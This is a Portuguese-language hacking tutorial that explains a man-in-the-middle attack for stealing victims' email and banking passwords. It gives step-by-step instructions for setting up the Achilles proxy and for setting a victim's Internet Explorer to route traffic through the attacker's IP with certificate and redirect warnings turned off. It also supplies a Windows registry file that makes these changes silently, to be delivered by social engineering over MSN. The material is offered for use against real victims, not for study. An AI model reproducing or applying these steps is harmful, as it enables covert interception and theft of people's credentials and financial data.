Técnica - Men In The Middle - Interceptação de dados

COMO FUNCIONA?

A técnica “Men In The Middle” (Homem No Meio ) consiste em se introduzir entre o usuário (cliente) e ao servidor que ele está acessado, para interceptar dados sigilosos que o mesmo está fornecendo. Parece simples falando... mas na realidade é! Ela é uma forma de sniffing, porém com a vantagem de que os dados vêm em texto puro para o hacker, dispensando os serviços dos decrypters, é usada para roubo de senhas de email, senhas bancárias ou qualquer outro tipo de informação sigilosa fornecida ao navegador, tudo sem precisar desativar antivírus, firewall e fazer phishing, o que faz dessa uma excelente técnica. Mesmo um usuário com certa experiência em informática não desconfiaria de absolutamente nada antes de fornecer suas informações confidenciais ao site, pois ele tem certeza de que o ambiente está seguro.

Em uma conexão normal com um servidor seguro, o cliente envia suas informações através de um canal criptografado, que por sua vez retorna as informações desejadas ao cliente, pelo mesmo caminho

Cliente trocando informações com um servidor num ambiente seguro.

Porém, quando usamos a técnica “Men In The Middle” no cliente, nos passamos pelo servidor e enganamos o cliente, e também nos passamos pelo cliente enganando o servidor. Dessa forma nos introduzimos no meio do canal, recebendo todas as informações sigilosas, como ilustrado no esquema abaixo:

Cliente pensando que está trocando informações com um servidor num ambiente seguro.
PARTE PRÁTICA: USANDO O ACHILLES

Para fazer a interceptação, usaremos o programa Achilles, disponibilizado para download no fim do tutorial, que é um servidor Proxy de fácil configuração e utilização, se tornando um dos grandes aliados do hacker mal intencionado. Posteriormente faremos algumas configurações no PC da vítima -- não fique triste ainda, mais pra frente mostrarei um método de conseguir fazer essas configurações sem contato físico com a máquina -– para que fique tudo preparado para conseguirmos interceptar. Configuração do Achilles:

Janela principal do Achilles 0.27.


1.1 Em Listen on Port (Escutar na Porta) coloque o número da porta em que usaremos para se conectar ao PC da vítima. Recomendo usar a porta 8080, mas se estiver bloqueada pelo firewall sinta-se a vontade para testar a porta que quiser.

1.2. Em Intercept Modes selecione as caixas “Intercept mode ON” para receber os logs e “Ignore .jpg/.gif” para desabilitar as imagens, facilitando a leitura dos logs.

1.3. Agora clique no ícone Play e espere aparecer Running no Status do programa.

1.4. Clique no ícone C (Cliente) e S (Servidor) para abrir a janela dos logs que você receberá.

Pronto, com isso finalizamos a configuração do Achilles, agora vamos a segunda parte, onde faremos algumas configurações no browser do PC da vítima para permitir nossa interceptação. Lembrando que esse tutorial foi feito com base no Internet Explorer.

2.1. Abra o Internet Explorer da vítima e vá no menu Ferramentas > Opções de Internet. Agora clique na aba Conexões e clique em Configurações da rede local (LAN).

2.2. Primeiro marque o campo “Usar um servidor Proxy para a rede local” e posteriormente coloque seu IP em Endereço e a porta que configuramos no Achilles, no caso a 8080. Se o seu IP for dinâmico use o NO-IP e crie um endereço DNS fixo para seu IP. Clique em OK.

2.3. Agora vá na aba Avançadas e desmarque as seguites opções: ”Avisar quando o certificado do site for inválido” e “Avisar se os formulários submetidos estiverem sendo redirecionados” e clique em OK novamente.

Está tudo pronto para ser interceptado, basta esperar a vítima se logar nos sites, que as informações aparecerão nas janelas de logs do Achilles no seu computador. Como promessa é dívida agora mostrarei um jeito de fazer essa configuração no IE da vítima remotamente.

Para simplificar, o que você terá que fazer é editar o script abaixo, salvar como arquivo de registro do Windows (.reg) e executar no computador da vítima. Isso pode agilizar o trabalho fisicamente ou pode ser enviado por MSN para a vítima usando a Engenharia Social para fazer ela executar o arquivo. Vale a ajuda de todas as técnicas que você souber agora.


Código: Selecionar todos
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
”ProxyEnable”=dword:00000001
“ProxyServer”=”127.0.0.1:8080”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
”WarnonBadCertRecving”=dword:00000000
”WarnOnPostRedirect”=dword:00000000



3.1. Abra o Bloco de Notas, copie o código acima e substitua “ProxyServer”=”127.0.0.1:8080” para “ProxyServer”=”seu.endereço.ip:sua.porta”.

3.2. Salve o arquivo com o nome arquivo.reg –- tanto faz o nome, o importante é salvar como tipo “Todos os arquivos” e inserir a extensão .reg no nome do arquivo –- feito isso basta executar o arquivo no PC da vítima e esperar os logs chegarem.